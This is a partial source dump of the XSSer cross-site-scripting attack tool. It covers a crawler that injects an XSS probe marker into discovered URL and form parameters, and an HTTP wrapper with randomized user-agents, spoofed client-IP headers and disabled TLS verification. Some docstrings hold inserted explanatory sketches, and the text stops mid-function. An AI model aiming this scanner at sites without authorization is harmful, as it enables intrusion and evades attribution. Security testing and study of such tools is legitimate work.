| ![XSSer](https://xsser.03c8.net/xsser/thehive8.png "XSSer [HTTP DOM] Exploit") 88 | 89 | ![XSSer](https://xsser.03c8.net/xsser/zika4.png "XSSer GeoMap") 90 | 91 | -------------------------------------------------------------------------------- /core/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | This file is part of the XSSer project, https://xsser.03c8.net 3 | 4 | Copyright (c) 2010/2020 | psy 5 | 6 | xsser is free software; you can redistribute it and/or modify it under 7 | the terms of the GNU General Public License as published by the Free 8 | Software Foundation version 3 of the License. 
9 | 10 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 11 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 12 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 13 | details. 14 | 15 | You should have received a copy of the GNU General Public License along 16 | with xsser; if not, write to the Free Software Foundation, Inc., 51 17 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 18 | """ 19 | -------------------------------------------------------------------------------- /core/crawler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2021 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | import sys 23 | import urllib.request, urllib.parse, urllib.error 24 | import time 25 | import traceback 26 | from . import curlcontrol 27 | from . import threadpool 28 | from queue import Queue 29 | from collections import defaultdict 30 | from bs4 import BeautifulSoup 31 | from bs4.dammit import EncodingDetector 32 | try: 33 | import pycurl 34 | except: 35 | print("\n[Error] Cannot import lib: pycurl. 
\n\n To install it try:\n\n $ 'sudo apt-get install python3-pycurl' or 'pip3 install pycurl'\n") 36 | sys.exit() 37 | class EmergencyLanding(Exception): 38 | pass 39 | 40 | class Crawler(object): 41 | """ 42 | Crawler class. 43 | """ 44 | def __init__(self, parent, curlwrapper=None, crawled=None, pool=None): 45 | # verbose: 0-no printing, 1-prints dots, 2-prints full output 46 | self.verbose = 0 47 | self._parent = parent 48 | self._to_crawl = [] 49 | self._parse_external = True 50 | self._requests = [] 51 | self._ownpool = False 52 | self._reporter = None 53 | self._armed = True 54 | self._poolsize = 10 55 | self._found_args = defaultdict(list) 56 | self.pool = pool 57 | if crawled: 58 | self._crawled = crawled 59 | else: 60 | self._crawled = [] 61 | if curlwrapper: 62 | self.curl = curlwrapper 63 | else: 64 | self.curl = curlcontrol.Curl 65 | 66 | def report(self, msg): 67 | if self._reporter: 68 | self._reporter.report(msg) 69 | else: 70 | print(msg) 71 | 72 | def set_reporter(self, reporter): 73 | self._reporter = reporter 74 | 75 | def _find_args(self, url): 76 | """ 77 | find parameters in given url. 
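For illustration, the transformation applied to each discovered parameter can be sketched stand-alone (this mirrors what generate_result() below does: each query argument is replaced, one at a time, with the "XSS" probe marker; the helper name make_attack_url is invented here):

```python
import urllib.parse

def make_attack_url(url, arg_name):
    # Rebuild the URL with the given query argument replaced by the
    # "XSS" probe marker, keeping the other arguments intact.
    parsed = urllib.parse.urlparse(url)
    qs = {k: v[0] for k, v in urllib.parse.parse_qs(parsed.query).items()}
    qs[arg_name] = "XSS"
    path = parsed.scheme + "://" + parsed.netloc + parsed.path
    return path + "?" + urllib.parse.urlencode(qs)

print(make_attack_url("http://host/item.php?id=1&page=2", "id"))
```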
78 | """ 79 | parsed = urllib.parse.urlparse(url) 80 | if "C=" in parsed.query and "O=" in parsed.query: 81 | qs = "" 82 | else: 83 | qs = urllib.parse.parse_qs(parsed.query) 84 | if parsed.scheme: 85 | path = parsed.scheme + "://" + parsed.netloc + parsed.path 86 | else: 87 | path = parsed.netloc + parsed.path 88 | for arg_name in qs: 89 | key = (arg_name, parsed.netloc) 90 | zipped = list(zip(*self._found_args[key])) 91 | if not zipped or not path in zipped[0]: 92 | self._found_args[key].append([path, url]) 93 | self.generate_result(arg_name, path, url) 94 | if not qs: 95 | parsed = urllib.parse.urlparse(url) 96 | if path.endswith("/"): 97 | attack_url = path + "XSS" 98 | else: 99 | attack_url = path + "/XSS" 100 | if not attack_url in self._parent.crawled_urls: 101 | self._parent.crawled_urls.append(attack_url) 102 | ncurrent = sum([len(s) for s in list(self._found_args.values())]) 103 | if ncurrent >= self._max: 104 | self._armed = False 105 | 106 | def cancel(self): 107 | self._armed = False 108 | 109 | def crawl(self, path, depth=3, width=0, local_only=True): 110 | """ 111 | setup and perform a crawl on the given url. 
112 | """ 113 | if not self._armed: 114 | return [] 115 | parsed = urllib.parse.urlparse(path) 116 | basepath = parsed.scheme + "://" + parsed.netloc 117 | self._parse_external = not local_only 118 | if not self.pool: 119 | self.pool = threadpool.ThreadPool(self._poolsize) 120 | if self.verbose == 2: 121 | self.report("crawling: " + path) 122 | if width == 0: 123 | self._max = 1000000000 124 | else: 125 | self._max = int(width) 126 | self._path = path 127 | self._depth = depth 128 | attack_urls = [] 129 | if not self._parent._landing and self._armed: 130 | self._crawl(basepath, path, depth, width) 131 | # now parse all found items 132 | if self._ownpool: 133 | self.pool.dismissWorkers(len(self.pool.workers)) 134 | self.pool.joinAllDismissedWorkers() 135 | return attack_urls 136 | 137 | def shutdown(self): 138 | if self._ownpool: 139 | self.pool.dismissWorkers(len(self.pool.workers)) 140 | self.pool.joinAllDismissedWorkers() 141 | 142 | def generate_result(self, arg_name, path, url): 143 | parsed = urllib.parse.urlparse(url) 144 | qs = urllib.parse.parse_qs(parsed.query) 145 | qs_joint = {} 146 | for key, val in qs.items(): 147 | qs_joint[key] = val[0] 148 | attack_qs = dict(qs_joint) 149 | attack_qs[arg_name] = "XSS" 150 | attack_url = path + '?' + urllib.parse.urlencode(attack_qs) 151 | if not attack_url in self._parent.crawled_urls: 152 | self._parent.crawled_urls.append(attack_url) 153 | 154 | def _crawl(self, basepath, path, depth=3, width=0): 155 | """ 156 | perform a crawl on the given url. 157 | 158 | this function downloads and looks for links. 
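The link discovery that eventually runs in _get_done() uses BeautifulSoup's findAll('a') with _emergency_parse() as a fallback; a stdlib-only sketch of the same idea (resolve every href against the page URL) looks like this:

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

class LinkExtractor(HTMLParser):
    # Collect href targets, resolved against the page URL, roughly
    # the way _get_done() does with BeautifulSoup's findAll('a').
    def __init__(self, base):
        super().__init__()
        self.base = base
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(urljoin(self.base, value))

parser = LinkExtractor("http://host/dir/")
parser.feed('<a href="page.php?id=1">x</a><a href="/top">y</a>')
print(parser.links)
```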
159 | """ 160 | self._crawled.append(path) 161 | if not path.startswith("http"): 162 | return 163 | 164 | def _cb(request, result): 165 | self._get_done(depth, width, request, result) 166 | 167 | self._requests.append(path) 168 | self.pool.addRequest(self._curl_main, [[path, depth, width, basepath]], 169 | self._get_done_dummy, self._get_error) 170 | 171 | def _curl_main(self, pars): 172 | path, depth, width, basepath = pars 173 | if not self._armed or len(self._parent.crawled_urls) >= self._max: 174 | raise EmergencyLanding 175 | c = self.curl() 176 | c.set_timeout(5) 177 | try: 178 | res = c.get(path) 179 | except Exception as error: 180 | c.close() 181 | del c 182 | raise error 183 | c_info = c.info().get('content-type', None) 184 | c.close() 185 | del c 186 | self._get_done(basepath, depth, width, path, res, c_info) 187 | 188 | def _get_error(self, request, error): 189 | path, depth, width, basepath = request.args[0] 190 | e_type, e_value, e_tb = error 191 | if e_type == pycurl.error: 192 | errno, message = e_value.args 193 | if errno == 28: 194 | print("requests pyerror -1") 195 | self.enqueue_jobs() 196 | self._requests.remove(path) 197 | return # timeout 198 | else: 199 | self.report('crawler curl error: '+message+' ('+str(errno)+')') 200 | elif e_type == EmergencyLanding: 201 | pass 202 | else: 203 | traceback.print_tb(e_tb) 204 | self.report('crawler error: '+str(e_value)+' '+path) 205 | if not e_type == EmergencyLanding: 206 | for reporter in self._parent._reporters: 207 | reporter.mosquito_crashed(path, str(e_value)) 208 | self.enqueue_jobs() 209 | self._requests.remove(path) 210 | 211 | def _emergency_parse(self, html_data, start=0): 212 | links = set() 213 | pos = 0 214 | try: 215 | data_len = len(html_data) 216 | except: 217 | data_len = html_data 218 | try: 219 | while pos < data_len: 220 | if len(links)+start > self._max: 221 | break 222 | pos = html_data.find("href=", pos) 223 | if not pos == -1: 224 | sep = html_data[pos+5] 225 | if sep == "h": 
226 | pos -= 1 227 | sep=">" 228 | href = html_data[pos+6:html_data.find(sep, pos+7)].split("#")[0] 229 | pos = pos+1 230 | links.add(href) 231 | else: 232 | break 233 | except: 234 | pass 235 | return [{'href': s} for s in links] 236 | 237 | def _get_done_dummy(self, request, result): 238 | path = request.args[0][0] 239 | self.enqueue_jobs() 240 | self._requests.remove(path) 241 | 242 | def enqueue_jobs(self): 243 | if len(self.pool.workRequests) < int(self._max/2): 244 | while self._to_crawl: 245 | next_job = self._to_crawl.pop() 246 | self._crawl(*next_job) 247 | 248 | def _get_done(self, basepath, depth, width, path, html_data, content_type): 249 | if not self._armed or len(self._parent.crawled_urls) >= self._max: 250 | raise EmergencyLanding 251 | try: 252 | encoding = content_type.split(";")[1].split("=")[1].strip() 253 | except: 254 | encoding = None 255 | try: 256 | soup = BeautifulSoup(html_data, 'html.parser') 257 | links = None 258 | except: 259 | soup = None 260 | links = self._emergency_parse(html_data) 261 | for reporter in self._parent._reporters: 262 | reporter.start_crawl(path) 263 | if not links and soup: 264 | links = soup.findAll('a') 265 | forms = soup.findAll('form') 266 | for form in forms: 267 | pars = {} 268 | if "action" in form: 269 | action_path = urllib.parse.urljoin(path, form["action"]) 270 | else: 271 | action_path = path 272 | for input_par in form.findAll('input'): 273 | if "name" not in input_par: 274 | continue 275 | value = "foo" 276 | if "value" in input_par and input_par["value"]: 277 | value = input_par["value"] 278 | pars[input_par["name"]] = value 279 | for input_par in form.findAll('select'): 280 | pars[input_par["name"]] = "1" 281 | if pars: 282 | links.append({"url":action_path + '?' 
+ urllib.parse.urlencode(pars)}) 283 | else: 284 | links.append({"url":action_path}) 285 | links += self._emergency_parse(html_data, len(links)) 286 | if self.verbose == 2: 287 | self.report(" "*(self._depth-depth) + path +" "+ str(len(links))) 288 | elif self.verbose: 289 | sys.stdout.write(".") 290 | sys.stdout.flush() 291 | if len(links) > self._max: 292 | links = links[:self._max] 293 | for a in links: 294 | try: 295 | #href = str(a['href'].encode('utf-8')) 296 | href = str(a['href']) 297 | except KeyError: 298 | # this link has no href 299 | continue 300 | except: 301 | # can't decode or something darker.. 302 | continue 303 | if href.startswith("javascript") or href.startswith('mailto:'): 304 | continue 305 | href = urllib.parse.urljoin(path, href) 306 | if not href.startswith("http") or not "." in href: 307 | continue 308 | href = href.split('#',1)[0] 309 | scheme_rpos = href.rfind('http://') 310 | if not scheme_rpos in [0, -1]: 311 | # looks like some kind of redirect so we try both too ;) 312 | href1 = href[scheme_rpos:] 313 | href2 = href[:scheme_rpos] 314 | self._check_url(basepath, path, href1, depth, width) 315 | self._check_url(basepath, path, href2, depth, width) 316 | self._check_url(basepath, path, href, depth, width) 317 | return self._found_args 318 | 319 | def _check_url(self, basepath, path, href, depth, width): 320 | """ 321 | process the given url for a crawl 322 | check to see if we have to continue crawling on the given url. 
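The decision applied in the body below can be sketched stand-alone (the helper name should_crawl is invented here): a link is followed only when external crawling is allowed or the link stays under the starting site, and only if it was not crawled before:

```python
def should_crawl(basepath, href, crawled, parse_external=False):
    # Follow the link only if external crawling is allowed or the
    # link stays under the starting site, and it is not a repeat.
    return (parse_external or href.startswith(basepath)) and href not in crawled

base = "http://host"
print(should_crawl(base, "http://host/a", []))   # local link
print(should_crawl(base, "http://other/a", []))  # external link
```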
323 | """ 324 | do_crawling = self._parse_external or href.startswith(basepath) 325 | if do_crawling and not href in self._crawled: 326 | self._find_args(href) 327 | for reporter in self._parent._reporters: 328 | reporter.add_link(path, href) 329 | if self._armed and depth>0: 330 | if len(self._to_crawl) < self._max: 331 | self._to_crawl.append([basepath, href, depth-1, width]) 332 | -------------------------------------------------------------------------------- /core/curlcontrol.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2020 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | import os, urllib.request, urllib.parse, urllib.error, email, re, time, random, sys 23 | from io import StringIO as StringIO 24 | try: 25 | import pycurl 26 | except: 27 | print("\n[Error] Cannot import lib: pycurl. \n\n To install it try:\n\n $ 'sudo apt-get install python3-pycurl' or 'pip3 install pycurl'\n") 28 | sys.exit() 29 | class Curl: 30 | """ 31 | Class to control curl on behalf of the application. 
32 | """ 33 | cookie = None 34 | dropcookie = None 35 | referer = None 36 | headers = None 37 | proxy = None 38 | ignoreproxy = None 39 | tcp_nodelay = None 40 | xforw = None 41 | xclient = None 42 | atype = None 43 | acred = None 44 | #acert = None 45 | retries = 1 46 | delay = 0 47 | followred = 0 48 | fli = None 49 | agents = [] # user-agents 50 | try: 51 | f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents 52 | except: 53 | f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing 54 | for line in f: 55 | agents.append(line) 56 | agent = random.choice(agents).strip() # set random user-agent 57 | 58 | def __init__(self, base_url="", fakeheaders=[ 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg', 'Connection: Keep-Alive', 'Content-type: application/x-www-form-urlencoded; charset=UTF-8']): 59 | self.handle = pycurl.Curl() 60 | self._closed = False 61 | self.set_url(base_url) 62 | self.verbosity = 0 63 | self.signals = 1 64 | self.payload = "" 65 | self.header = StringIO() 66 | self.fakeheaders = fakeheaders 67 | self.headers = None 68 | self.set_option(pycurl.SSL_VERIFYHOST, 0) 69 | self.set_option(pycurl.SSL_VERIFYPEER, 0) 70 | try: 71 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_2) # max supported version by pycurl 72 | except: 73 | try: 74 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_1) 75 | except: # use vulnerable TLS/SSL versions (TLS1_0 -> weak enc | SSLv2 + SSLv3 -> deprecated) 76 | try: 77 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_0) 78 | except: 79 | try: 80 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) 81 | except: 82 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv2) 83 | self.set_option(pycurl.FOLLOWLOCATION, 0) 84 | self.set_option(pycurl.MAXREDIRS, 50) 85 | # this is 'black magic' 86 | self.set_option(pycurl.COOKIEFILE, '/dev/null') 87 | self.set_option(pycurl.COOKIEJAR, '/dev/null') 88 | 
self.set_timeout(30) 89 | self.set_option(pycurl.NETRC, 1) 90 | self.set_nosignals(1) 91 | 92 | def payload_callback(x): 93 | self.payload += str(x) 94 | self.set_option(pycurl.WRITEFUNCTION, payload_callback) 95 | def header_callback(x): 96 | self.header.write(str(x)) 97 | self.set_option(pycurl.HEADERFUNCTION, header_callback) 98 | 99 | def set_url(self, url): 100 | """ 101 | Set HTTP base url. 102 | """ 103 | self.base_url = url 104 | self.set_option(pycurl.URL, self.base_url) 105 | return url 106 | 107 | def set_cookie(self, cookie): 108 | """ 109 | Set HTTP cookie. 110 | """ 111 | self.cookie = cookie 112 | self.dropcookie = dropcookie 113 | if dropcookie: 114 | self.set_option(pycurl.COOKIELIST, 'ALL') 115 | self.set_option(pycurl.COOKIE, None) 116 | else: 117 | self.set_option(pycurl.COOKIELIST, '') 118 | self.set_option(pycurl.COOKIE, self.cookie) 119 | return cookie 120 | 121 | def set_agent(self, agent): 122 | """ 123 | Set HTTP user agent. 124 | """ 125 | self.agent = agent 126 | self.set_option(pycurl.USERAGENT, self.agent) 127 | return agent 128 | 129 | def set_referer(self, referer): 130 | """ 131 | Set HTTP referer. 132 | """ 133 | self.referer = referer 134 | self.set_option(pycurl.REFERER, self.referer) 135 | return referer 136 | 137 | def set_headers(self, headers): 138 | """ 139 | Set extra headers. 140 | """ 141 | self.set_option(pycurl.HTTPHEADER, [str(headers)]) 142 | 143 | def set_proxy(self, ignoreproxy, proxy): 144 | """ 145 | Set the proxy to use. 146 | """ 147 | self.proxy = proxy 148 | self.ignoreproxy = ignoreproxy 149 | if ignoreproxy: 150 | self.set_option(pycurl.PROXY, "") 151 | else: 152 | self.set_option(pycurl.PROXY, self.proxy) 153 | return proxy 154 | 155 | def set_option(self, *args): 156 | """ 157 | Set the given option. 158 | """ 159 | self.handle.setopt(*args) 160 | 161 | def set_verbosity(self, level): 162 | """ 163 | Set the verbosity level. 
164 | """ 165 | self.set_option(pycurl.VERBOSE, level) 166 | 167 | def set_nosignals(self, signals="1"): 168 | """ 169 | Disable signals. 170 | 171 | curl will be using other means besides signals to timeout 172 | """ 173 | self.signals = signals 174 | self.set_option(pycurl.NOSIGNAL, self.signals) 175 | return signals 176 | 177 | def set_tcp_nodelay(self, tcp_nodelay): 178 | """ 179 | Set the TCP_NODELAY option. 180 | """ 181 | self.tcp_nodelay = tcp_nodelay 182 | self.set_option(pycurl.TCP_NODELAY, tcp_nodelay) 183 | return tcp_nodelay 184 | 185 | def set_timeout(self, timeout): 186 | """ 187 | Set timeout for requests. 188 | """ 189 | self.set_option(pycurl.CONNECTTIMEOUT,timeout) 190 | self.set_option(pycurl.TIMEOUT, timeout) 191 | return timeout 192 | 193 | def set_follow_redirections(self, followred, fli): 194 | """ 195 | Set follow locations parameters to follow redirection pages (302) 196 | """ 197 | self.followred = followred 198 | self.fli = fli 199 | if followred: 200 | self.set_option(pycurl.FOLLOWLOCATION , 1) 201 | self.set_option(pycurl.MAXREDIRS, 50) 202 | if fli: 203 | self.set_option(pycurl.MAXREDIRS, fli) 204 | else: 205 | self.set_option(pycurl.FOLLOWLOCATION , 0) 206 | return followred 207 | 208 | def do_head_check(self, urls): 209 | """ 210 | Send a HEAD request before to start to inject to verify stability of the target 211 | """ 212 | for u in urls: 213 | self.set_option(pycurl.URL, u) 214 | self.set_option(pycurl.NOBODY,1) 215 | self.set_option(pycurl.FOLLOWLOCATION, 1) 216 | self.set_option(pycurl.MAXREDIRS, 50) 217 | self.set_option(pycurl.SSL_VERIFYHOST, 0) 218 | self.set_option(pycurl.SSL_VERIFYPEER, 0) 219 | try: 220 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_2) # max supported version by pycurl 221 | except: 222 | try: 223 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_1) 224 | except: # use vulnerable TLS/SSL versions (TLS1_0 -> weak enc | SSLv2 + SSLv3 -> deprecated) 225 | try: 226 | 
self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_0) 227 | except: 228 | try: 229 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) 230 | except: 231 | self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv2) 232 | if self.fakeheaders: 233 | from core.randomip import RandomIP 234 | if self.xforw: 235 | generate_random_xforw = RandomIP() 236 | xforwip = generate_random_xforw._generateip('') 237 | xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)] 238 | if self.xclient: 239 | generate_random_xclient = RandomIP() 240 | xclientip = generate_random_xclient._generateip('') 241 | xclientfakevalue = ['X-Client-IP: ' + str(xclientip)] 242 | if self.xforw: 243 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue) 244 | if self.xclient: 245 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue + xclientfakevalue) 246 | elif self.xclient: 247 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xclientfakevalue) 248 | if self.headers: 249 | self.fakeheaders = self.fakeheaders + self.headers 250 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders) 251 | if self.agent: 252 | self.set_option(pycurl.USERAGENT, self.agent) 253 | if self.referer: 254 | self.set_option(pycurl.REFERER, self.referer) 255 | if self.proxy: 256 | self.set_option(pycurl.PROXY, self.proxy) 257 | if self.ignoreproxy: 258 | self.set_option(pycurl.PROXY, "") 259 | if self.timeout: 260 | self.set_option(pycurl.CONNECTTIMEOUT, self.timeout) 261 | self.set_option(pycurl.TIMEOUT, self.timeout) 262 | if self.signals: 263 | self.set_option(pycurl.NOSIGNAL, self.signals) 264 | if self.tcp_nodelay: 265 | self.set_option(pycurl.TCP_NODELAY, self.tcp_nodelay) 266 | if self.cookie: 267 | self.set_option(pycurl.COOKIE, self.cookie) 268 | try: 269 | self.handle.perform() 270 | except: 271 | return 272 | if str(self.handle.getinfo(pycurl.HTTP_CODE)) in ["302", "301"]: 273 | self.set_option(pycurl.FOLLOWLOCATION, 1) 274 | 275 | def __request(self, 
relative_url=None, headers=None): 276 | """ 277 | Perform a request and returns the payload. 278 | """ 279 | if self.fakeheaders: 280 | from core.randomip import RandomIP 281 | if self.xforw: 282 | """ 283 | Set the X-Forwarded-For to use. 284 | """ 285 | generate_random_xforw = RandomIP() 286 | xforwip = generate_random_xforw._generateip('') 287 | xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)] 288 | if self.xclient: 289 | """ 290 | Set the X-Client-IP to use. 291 | """ 292 | generate_random_xclient = RandomIP() 293 | xclientip = generate_random_xclient._generateip('') 294 | xclientfakevalue = ['X-Client-IP: ' + str(xclientip)] 295 | if self.xforw: 296 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue) 297 | if self.xclient: 298 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue + xclientfakevalue) 299 | elif self.xclient: 300 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xclientfakevalue) 301 | if headers: 302 | self.set_headers(headers) 303 | if self.agent: 304 | self.set_option(pycurl.USERAGENT, self.agent) 305 | if self.referer: 306 | self.set_option(pycurl.REFERER, self.referer) 307 | if self.proxy: 308 | self.set_option(pycurl.PROXY, self.proxy) 309 | if self.ignoreproxy: 310 | self.set_option(pycurl.PROXY, "") 311 | if relative_url: 312 | self.set_option(pycurl.URL,os.path.join(self.base_url,relative_url)) 313 | if self.timeout: 314 | self.set_option(pycurl.CONNECTTIMEOUT, self.timeout) 315 | self.set_option(pycurl.TIMEOUT, self.timeout) 316 | if self.signals: 317 | self.set_option(pycurl.NOSIGNAL, self.signals) 318 | if self.tcp_nodelay: 319 | self.set_option(pycurl.TCP_NODELAY, self.tcp_nodelay) 320 | if self.cookie: 321 | self.set_option(pycurl.COOKIE, self.cookie) 322 | if self.followred: 323 | self.set_option(pycurl.FOLLOWLOCATION , 1) 324 | self.set_option(pycurl.MAXREDIRS, 50) 325 | if self.fli: 326 | self.set_option(pycurl.MAXREDIRS, int(self.fli)) 327 | else: 328 | 
self.set_option(pycurl.FOLLOWLOCATION , 0) 329 | if self.fli: 330 | print("\n[E] You must launch --follow-redirects command to set correctly this redirections limit\n") 331 | return 332 | """ 333 | Set the HTTP authentication method: Basic, Digest, GSS, NTLM or Certificate 334 | """ 335 | if self.atype and self.acred: 336 | atypelower = self.atype.lower() 337 | if atypelower not in ( "basic", "digest", "ntlm", "gss" ): 338 | print("\n[E] HTTP authentication type value must be: Basic, Digest, GSS or NTLM\n") 339 | return 340 | acredregexp = re.search(r"^(.*?)\:(.*?)$", self.acred) 341 | if not acredregexp: 342 | print("\n[E] HTTP authentication credentials value must be in format username:password\n") 343 | return 344 | user = acredregexp.group(1) 345 | password = acredregexp.group(2) 346 | self.set_option(pycurl.USERPWD, "%s:%s" % (user,password)) 347 | if atypelower == "basic": 348 | self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC) 349 | elif atypelower == "digest": 350 | self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_DIGEST) 351 | elif atypelower == "ntlm": 352 | self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_NTLM) 353 | elif atypelower == "gss": 354 | self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_GSSNEGOTIATE) 355 | else: 356 | self.set_option(pycurl.HTTPAUTH, None) 357 | self.set_option(pycurl.HTTPHEADER, ["Accept:"]) 358 | elif self.atype and not self.acred: 359 | print("\n[E] You specified the HTTP authentication type, but did not provide the credentials\n") 360 | return 361 | elif not self.atype and self.acred: 362 | print("\n[E] You specified the HTTP authentication credentials, but did not provide the type\n") 363 | return 364 | #if self.acert: 365 | # acertregexp = re.search("^(.+?),\s*(.+?)$", self.acert) 366 | # if not acertregexp: 367 | # print "\n[E] HTTP authentication certificate option must be 'key_file,cert_file'\n" 368 | # return 369 | # # os.path.expanduser for support of paths with ~ 370 | # key_file = 
os.path.expanduser(acertregexp.group(1)) 371 | # cert_file = os.path.expanduser(acertregexp.group(2)) 372 | # self.set_option(pycurl.SSL_VERIFYHOST, 0) 373 | # self.set_option(pycurl.SSL_VERIFYPEER, 1) 374 | # self.set_option(pycurl.SSH_PUBLIC_KEYFILE, key_file) 375 | # self.set_option(pycurl.CAINFO, cert_file) 376 | # self.set_option(pycurl.SSLCERT, cert_file) 377 | # self.set_option(pycurl.SSLCERTTYPE, 'p12') 378 | # self.set_option(pycurl.SSLCERTPASSWD, '1234') 379 | # self.set_option(pycurl.SSLKEY, key_file) 380 | # self.set_option(pycurl.SSLKEYPASSWD, '1234') 381 | # for file in (key_file, cert_file): 382 | # if not os.path.exists(file): 383 | # print "\n[E] File '%s' doesn't exist\n" % file 384 | # return 385 | self.set_option(pycurl.SSL_VERIFYHOST, 0) 386 | self.set_option(pycurl.SSL_VERIFYPEER, 0) 387 | self.header.seek(0,0) 388 | self.payload = "" 389 | for count in range(0, self.retries): 390 | time.sleep(self.delay) 391 | if self.dropcookie: 392 | self.set_option(pycurl.COOKIELIST, 'ALL') 393 | nocookie = ['Set-Cookie: ', ''] 394 | self.set_option(pycurl.HTTPHEADER, self.fakeheaders + nocookie) 395 | try: 396 | self.handle.perform() 397 | except: 398 | return 399 | return self.payload 400 | 401 | def get(self, url="", headers=None, params=None): 402 | """ 403 | Get a url. 404 | """ 405 | if params: 406 | url += "?" + urllib.parse.urlencode(params) 407 | self.set_option(pycurl.HTTPGET, 1) 408 | return self.__request(url, headers) 409 | 410 | def post(self, cgi, params, headers): 411 | """ 412 | Post a url. 413 | """ 414 | self.set_option(pycurl.POST, 1) 415 | self.set_option(pycurl.POSTFIELDS, params) 416 | return self.__request(cgi, headers) 417 | 418 | def body(self): 419 | """ 420 | Get the payload from the latest operation. 421 | """ 422 | return self.payload 423 | 424 | def info(self): 425 | """ 426 | Get an info dictionary from the selected url. 
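The parsing trick used here is the stdlib email module: after skipping the HTTP status line, the buffered response headers are a valid RFC 822 header block, so fields can be read like dictionary entries. A stand-alone sketch:

```python
import email

# Raw response headers as buffered by header_callback(), with the
# "HTTP/1.1 200 OK" status line already skipped (info() does this
# with a readline() before parsing).
raw_headers = (
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Server: nginx\r\n"
    "\r\n"
)
m = email.message_from_string(raw_headers)
print(m["content-type"])  # header lookup is case-insensitive
print(m["server"])
```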
427 | """ 428 | self.header.seek(0,0) 429 | url = self.handle.getinfo(pycurl.EFFECTIVE_URL) 430 | if url.startswith('http'): 431 | self.header.readline() 432 | m = email.message_from_string(str(self.header)) 433 | else: 434 | m = email.message_from_string(str(StringIO())) 435 | #m['effective-url'] = url 436 | m['http-code'] = str(self.handle.getinfo(pycurl.HTTP_CODE)) 437 | m['total-time'] = str(self.handle.getinfo(pycurl.TOTAL_TIME)) 438 | m['namelookup-time'] = str(self.handle.getinfo(pycurl.NAMELOOKUP_TIME)) 439 | m['connect-time'] = str(self.handle.getinfo(pycurl.CONNECT_TIME)) 440 | #m['pretransfer-time'] = str(self.handle.getinfo(pycurl.PRETRANSFER_TIME)) 441 | #m['redirect-time'] = str(self.handle.getinfo(pycurl.REDIRECT_TIME)) 442 | #m['redirect-count'] = str(self.handle.getinfo(pycurl.REDIRECT_COUNT)) 443 | #m['size-upload'] = str(self.handle.getinfo(pycurl.SIZE_UPLOAD)) 444 | #m['size-download'] = str(self.handle.getinfo(pycurl.SIZE_DOWNLOAD)) 445 | #m['speed-upload'] = str(self.handle.getinfo(pycurl.SPEED_UPLOAD)) 446 | m['header-size'] = str(self.handle.getinfo(pycurl.HEADER_SIZE)) 447 | m['request-size'] = str(self.handle.getinfo(pycurl.REQUEST_SIZE)) 448 | m['response-code'] = str(self.handle.getinfo(pycurl.RESPONSE_CODE)) 449 | m['ssl-verifyresult'] = str(self.handle.getinfo(pycurl.SSL_VERIFYRESULT)) 450 | try: 451 | 